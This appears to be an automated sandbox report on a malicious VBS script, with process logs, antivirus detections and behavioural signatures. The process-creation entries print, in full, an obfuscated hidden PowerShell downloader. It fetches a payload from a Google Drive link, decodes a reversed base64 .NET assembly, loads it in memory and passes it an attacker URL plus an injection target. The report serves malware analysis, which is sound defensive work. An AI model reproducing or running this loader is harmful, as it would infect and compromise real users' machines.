6VjRpbWFnZVRleHQuU3Vic3RyaW5nKHpWNHN0YXJ0JysnSW5kZXgsIHpWNGJhc2U2NExlbmcnKyd0aCk7elY0YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoelY0YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGtSaSBGb3JFYWNoLU9iamVjdCB7IHpWNF8gfSlbLTEuLi0oelY0YicrJ2FzZTY0Q29tbWFuZC5MZW5ndGgpXTt6VjRjb21tYW5kQnl0ZXMgPSBbU3lzdGUnKydtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHpWNGJhc2U2NFJldmVyc2VkKTt6VjRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoelY0Y29tbScrJ2FuZEJ5dGVzKTt6VjR2YWlNZXRob2QgPSBbZG4nKydsaWIuSU8uSG9tZV0uR2V0TWV0aG9kKCcrJ09MQ1ZBSU9MQyk7elY0dmFpTWV0aG9kLkludm9rZSh6VjRudWxsLCBAKE9MQ3R4dC45Njg1Nzh0dHR0dHRzZXRhbGRpb3JkL2dyby5zbmRrY3VkLmUnKydlZWNlZXJnc2J2eXl5eWFkbicrJ29tLy86cHR0aE9MQywgT0xDZGVzYXRpdmFkb09MQywgT0xDZGVzYXRpdmFkb09MQywnKycgT0xDZGVzYXRpdmFkb09MQywgT0wnKydDQWRkSW5Qcm9jZXNzMzJPTEMsIE9MQ2Rlc2F0aXZhZCcrJ29PTEMsIE9MQ2Rlc2F0aXZhZG9PTEMsT0xDZGVzYXQnKydpdmFkb09MQyxPTENkZXNhdGl2YWRvT0xDLE9MQ2Rlc2F0aXZhZG9PTCcrJ0MsT0xDZGVzYXRpdmFkb09MJysnQyxPTENkZXNhdGl2YWRvT0xDLE9MQzFPTEMpKTsnKS5yRVBsYWNFKCd6VjQnLCckJykuckVQbGFjRSgoW0NoQVJdMTA3K1tDaEFSXTgyK1tDaEFSXTEwNSksJ3wnKS5yRVBsYWNFKCdPTEMnLFtTdHJpbkddW0NoQVJdMzkpfCAuICggJGVuVjpDb01TcGVjWzQsMjQsMjVdLWpvaW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD filepath: powershell	1	1
CreateProcessInternalW Oct. 22, 2024, 9:52 a.m.	thread_identifier: 2792 thread_handle: 0x0000044c process_identifier: 2788 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('zV4imageUrl = OLChttps://dr'+'ive.'+'google.com/uc?export=download&id=1-'+'Wdgeq0fX9'+'aApdlSW9dln1Pc_KEGpfHp OLC;zV4webClient = New-Object System.Net.WebClient;zV4imageBytes = zV4webClient.DownloadData(zV4imageUrl);zV4imageText = [System.Text.Encoding]::UTF8.GetS'+'tring(zV4imageByt'+'es);zV4startFlag = OLC<<BASE64_START'+'>>OLC;zV4en'+'dFlag = OLC<<BASE64_END>>OLC;zV4startIndex = zV4imageText.IndexOf(zV4startFlag);zV4endIndex = zV4imageText.IndexOf(zV4endF'+'lag);zV4startIndex -ge 0 -and zV4endIndex -gt zV4startIndex;zV4s'+'tartIndex += zV4startFlag.Length;zV4base64Length '+'= zV4endIndex - zV4startIndex;zV4base64Command = zV4imageText.Substring(zV4start'+'Index, zV4base64Leng'+'th);zV4base64Reversed = -join (zV4base64Command.ToCharArray() kRi ForEach-Object { zV4_ })[-1..-(zV4b'+'ase64Command.Length)];zV4commandBytes = [Syste'+'m.Convert]::FromBase64String(zV4base64Reversed);zV4loadedAssembly = [System.Reflection.Assembly]::Load(zV4comm'+'andBytes);zV4vaiMethod = [dn'+'lib.IO.Home].GetMethod('+'OLCVAIOLC);zV4vaiMethod.Invoke(zV4null, @(OLCtxt.968578ttttttsetaldiord/gro.sndkcud.e'+'eeceergsbvyyyyadn'+'om//:ptthOLC, OLCdesativadoOLC, OLCdesativadoOLC,'+' OLCdesativadoOLC, OL'+'CAddInProcess32OLC, OLCdesativad'+'oOLC, OLCdesativadoOLC,OLCdesat'+'ivadoOLC,OLCdesativadoOLC,OLCdesativadoOL'+'C,OLCdesativadoOL'+'C,OLCdesativadoOLC,OLC1OLC));').rEPlacE('zV4','$').rEPlacE(([ChAR]107+[ChAR]82+[ChAR]105),'\|').rEPlacE('OLC',[StrinG][ChAR]39)\| . ( $enV:CoMSpec[4,24,25]-join'')" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 1 process_handle: 0x00000450	1	1

File has been identified by 9 AntiVirus engines on VirusTotal as malicious (9 events)

Skyhigh	BehavesLike.VBS.Trojan.np
Symantec	CL.Downloader!gen11
ESET-NOD32	VBS/TrojanDownloader.Agent.ABBQ
Avast	Script:SNH-gen [Trj]
Kaspersky	HEUR:Trojan.Script.Generic
Ikarus	Trojan.VBS.Agent
Google	Detected
huorong	HEUR:TrojanDownloader/PS.NetLoader.aj
AVG	Script:SNH-gen [Trj]

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Oct. 22, 2024, 9:52 a.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Oct. 22, 2024, 9:52 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Oct. 22, 2024, 9:52 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

One or more non-whitelisted processes were created (3 events)

parent_process	wscript.exe	martian_process	powershell -command $Codigo = 'KCd6VjRpbWFnZVVybCA9IE9MQ2h0dHBzOi8vZHInKydpdmUuJysnZ29vZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MS0nKydXZGdlcTBmWDknKydhQXBkbFNXOWRsbjFQY19LRUdwZkhwIE9MQzt6VjR3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3pWNGltYWdlQnl0ZXMgPSB6VjR3ZWJDbGllbnQuRG93bmxvYWREYXRhKHpWNGltYWdlVXJsKTt6VjRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFMnKyd0cmluZyh6VjRpbWFnZUJ5dCcrJ2VzKTt6VjRzdGFydEZsYWcgPSBPTEM8PEJBU0U2NF9TVEFSVCcrJz4+T0xDO3pWNGVuJysnZEZsYWcgPSBPTEM8PEJBU0U2NF9FTkQ+Pk9MQzt6VjRzdGFydEluZGV4ID0gelY0aW1hZ2VUZXh0LkluZGV4T2YoelY0c3RhcnRGbGFnKTt6VjRlbmRJbmRleCA9IHpWNGltYWdlVGV4dC5JbmRleE9mKHpWNGVuZEYnKydsYWcpO3pWNHN0YXJ0SW5kZXggLWdlIDAgLWFuZCB6VjRlbmRJbmRleCAtZ3QgelY0c3RhcnRJbmRleDt6VjRzJysndGFydEluZGV4ICs9IHpWNHN0YXJ0RmxhZy5MZW5ndGg7elY0YmFzZTY0TGVuZ3RoICcrJz0gelY0ZW5kSW5kZXggLSB6VjRzdGFydEluZGV4O3pWNGJhc2U2NENvbW1hbmQgPSB6VjRpbWFnZVRleHQuU3Vic3RyaW5nKHpWNHN0YXJ0JysnSW5kZXgsIHpWNGJhc2U2NExlbmcnKyd0aCk7elY0YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoelY0YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGtSaSBGb3JFYWNoLU9iamVjdCB7IHpWNF8gfSlbLTEuLi0oelY0YicrJ2FzZTY0Q29tbWFuZC5MZW5ndGgpXTt6VjRjb21tYW5kQnl0ZXMgPSBbU3lzdGUnKydtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHpWNGJhc2U2NFJldmVyc2VkKTt6VjRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoelY0Y29tbScrJ2FuZEJ5dGVzKTt6VjR2YWlNZXRob2QgPSBbZG4nKydsaWIuSU8uSG9tZV0uR2V0TWV0aG9kKCcrJ09MQ1ZBSU9MQyk7elY0dmFpTWV0aG9kLkludm9rZSh6VjRudWxsLCBAKE9MQ3R4dC45Njg1Nzh0dHR0dHRzZXRhbGRpb3JkL2dyby5zbmRrY3VkLmUnKydlZWNlZXJnc2J2eXl5eWFkbicrJ29tLy86cHR0aE9MQywgT0xDZGVzYXRpdmFkb09MQywgT0xDZGVzYXRpdmFkb09MQywnKycgT0xDZGVzYXRpdmFkb09MQywgT0wnKydDQWRkSW5Qcm9jZXNzMzJPTEMsIE9MQ2Rlc2F0aXZhZCcrJ29PTEMsIE9MQ2Rlc2F0aXZhZG9PTEMsT0xDZGVzYXQnKydpdmFkb09MQyxPTENkZXNhdGl2YWRvT0xDLE9MQ2Rlc2F0aXZhZG9PTCcrJ0MsT0xDZGVzYXRpdmFkb09MJysnQyxPTENkZXNhdGl2YWRvT0xDLE9MQzFPTEMpKTsnKS5yRVBsYWNFKCd6VjQnLCckJykuckVQbGFjRSgoW0NoQVJdMTA3K1tDaEFSXTgyK1tDaEFSXTEwNSksJ3wnKS5yRVBsYWNFKCdPTEMnLFtTdHJpbkddW0NoQVJdMzkpfCAuICggJGVuVjpDb01TcGVjWzQsMjQsMjVdLWpvaW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd6VjRpbWFnZVVybCA9IE9MQ2h0dHBzOi8vZHInKydpdmUuJysnZ29vZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MS0nKydXZGdlcTBmWDknKydhQXBkbFNXOWRsbjFQY19LRUdwZkhwIE9MQzt6VjR3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3pWNGltYWdlQnl0ZXMgPSB6VjR3ZWJDbGllbnQuRG93bmxvYWREYXRhKHpWNGltYWdlVXJsKTt6VjRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFMnKyd0cmluZyh6VjRpbWFnZUJ5dCcrJ2VzKTt6VjRzdGFydEZsYWcgPSBPTEM8PEJBU0U2NF9TVEFSVCcrJz4+T0xDO3pWNGVuJysnZEZsYWcgPSBPTEM8PEJBU0U2NF9FTkQ+Pk9MQzt6VjRzdGFydEluZGV4ID0gelY0aW1hZ2VUZXh0LkluZGV4T2YoelY0c3RhcnRGbGFnKTt6VjRlbmRJbmRleCA9IHpWNGltYWdlVGV4dC5JbmRleE9mKHpWNGVuZEYnKydsYWcpO3pWNHN0YXJ0SW5kZXggLWdlIDAgLWFuZCB6VjRlbmRJbmRleCAtZ3QgelY0c3RhcnRJbmRleDt6VjRzJysndGFydEluZGV4ICs9IHpWNHN0YXJ0RmxhZy5MZW5ndGg7elY0YmFzZTY0TGVuZ3RoICcrJz0gelY0ZW5kSW5kZXggLSB6VjRzdGFydEluZGV4O3pWNGJhc2U2NENvbW1hbmQgPSB6VjRpbWFnZVRleHQuU3Vic3RyaW5nKHpWNHN0YXJ0JysnSW5kZXgsIHpWNGJhc2U2NExlbmcnKyd0aCk7elY0YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoelY0YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGtSaSBGb3JFYWNoLU9iamVjdCB7IHpWNF8gfSlbLTEuLi0oelY0YicrJ2FzZTY0Q29tbWFuZC5MZW5ndGgpXTt6VjRjb21tYW5kQnl0ZXMgPSBbU3lzdGUnKydtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHpWNGJhc2U2NFJldmVyc2VkKTt6VjRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoelY0Y29tbScrJ2FuZEJ5dGVzKTt6VjR2YWlNZXRob2QgPSBbZG4nKydsaWIuSU8uSG9tZV0uR2V0TWV0aG9kKCcrJ09MQ1ZBSU9MQyk7elY0dmFpTWV0aG9kLkludm9rZSh6VjRudWxsLCBAKE9MQ3R4dC45Njg1Nzh0dHR0dHRzZXRhbGRpb3JkL2dyby5zbmRrY3VkLmUnKydlZWNlZXJnc2J2eXl5eWFkbicrJ29tLy86cHR0aE9MQywgT0xDZGVzYXRpdmFkb09MQywgT0xDZGVzYXRpdmFkb09MQywnKycgT0xDZGVzYXRpdmFkb09MQywgT0wnKydDQWRkSW5Qcm9jZXNzMzJPTEMsIE9MQ2Rlc2F0aXZhZCcrJ29PTEMsIE9MQ2Rlc2F0aXZhZG9PTEMsT0xDZGVzYXQnKydpdmFkb09MQyxPTENkZXNhdGl2YWRvT0xDLE9MQ2Rlc2F0aXZhZG9PTCcrJ0MsT0xDZGVzYXRpdmFkb09MJysnQyxPTENkZXNhdGl2YWRvT0xDLE9MQzFPTEMpKTsnKS5yRVBsYWNFKCd6VjQnLCckJykuckVQbGFjRSgoW0NoQVJdMTA3K1tDaEFSXTgyK1tDaEFSXTEwNSksJ3wnKS5yRVBsYWNFKCdPTEMnLFtTdHJpbkddW0NoQVJdMzkpfCAuICggJGVuVjpDb01TcGVjWzQsMjQsMjVdLWpvaW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('zV4imageUrl = OLChttps://dr'+'ive.'+'google.com/uc?export=download&id=1-'+'Wdgeq0fX9'+'aApdlSW9dln1Pc_KEGpfHp OLC;zV4webClient = New-Object System.Net.WebClient;zV4imageBytes = zV4webClient.DownloadData(zV4imageUrl);zV4imageText = [System.Text.Encoding]::UTF8.GetS'+'tring(zV4imageByt'+'es);zV4startFlag = OLC<<BASE64_START'+'>>OLC;zV4en'+'dFlag = OLC<<BASE64_END>>OLC;zV4startIndex = zV4imageText.IndexOf(zV4startFlag);zV4endIndex = zV4imageText.IndexOf(zV4endF'+'lag);zV4startIndex -ge 0 -and zV4endIndex -gt zV4startIndex;zV4s'+'tartIndex += zV4startFlag.Length;zV4base64Length '+'= zV4endIndex - zV4startIndex;zV4base64Command = zV4imageText.Substring(zV4start'+'Index, zV4base64Leng'+'th);zV4base64Reversed = -join (zV4base64Command.ToCharArray() kRi ForEach-Object { zV4_ })[-1..-(zV4b'+'ase64Command.Length)];zV4commandBytes = [Syste'+'m.Convert]::FromBase64String(zV4base64Reversed);zV4loadedAssembly = [System.Reflection.Assembly]::Load(zV4comm'+'andBytes);zV4vaiMethod = [dn'+'lib.IO.Home].GetMethod('+'OLCVAIOLC);zV4vaiMethod.Invoke(zV4null, @(OLCtxt.968578ttttttsetaldiord/gro.sndkcud.e'+'eeceergsbvyyyyadn'+'om//:ptthOLC, OLCdesativadoOLC, OLCdesativadoOLC,'+' OLCdesativadoOLC, OL'+'CAddInProcess32OLC, OLCdesativad'+'oOLC, OLCdesativadoOLC,OLCdesat'+'ivadoOLC,OLCdesativadoOLC,OLCdesativadoOL'+'C,OLCdesativadoOL'+'C,OLCdesativadoOLC,OLC1OLC));').rEPlacE('zV4','$').rEPlacE(([ChAR]107+[ChAR]82+[ChAR]105),'\|').rEPlacE('OLC',[StrinG][ChAR]39)\| . ( $enV:CoMSpec[4,24,25]-join'')"

Creates a suspicious Powershell process (9 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (20 events)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

FORGREECEEEOOOOMPDW-constraints.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All